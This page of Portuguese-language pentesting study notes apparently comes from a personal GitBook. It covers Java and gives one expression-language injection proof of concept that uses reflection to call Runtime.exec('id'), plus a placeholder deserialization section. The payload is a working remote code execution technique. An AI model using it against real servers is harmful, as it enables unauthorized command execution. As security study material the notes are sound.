Nosferatu's notes
  • print("Hello World 👽")
  • 📝Notas
    • Web
      • PHP
      • Python
      • XXE
      • Recon
      • LDAP Injection
      • Java
      • REST API
      • NodeJS
      • Insecure File Upload
      • Cloud Metadata - Testes de SSRF
    • Tricks
      • Windows
      • Linux
    • Privilege Escalation
      • Linux
      • Windows
        • Certificates
  • 🚩CTFs
    • Hackingclub
      • Cyborg - Easy
      • Kong - Hard
      • Rebind - Insane
      • CTF Gênesis - Eruza - Insane
      • Trailerhub - Medium
      • Êxodo - Hard
    • Hackthebox
      • Ambassador - Medium
    • Tryhackme
  • Blog
    • comming
Powered by GitBook
On this page
  • EXPRESSION LANGUAGE INJECTION RCE
  • JAVA DESSERIALIZATION
  1. 📝Notas
  2. Web

Java

EXPRESSION LANGUAGE INJECTION RCE

Prova de Conceito de Command Injection:

${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("jav
a.lang.Runtime")).exec("id")}

JAVA DESSERIALIZATION

comming soon... 😏

PreviousLDAP InjectionNextREST API

Last updated 2 years ago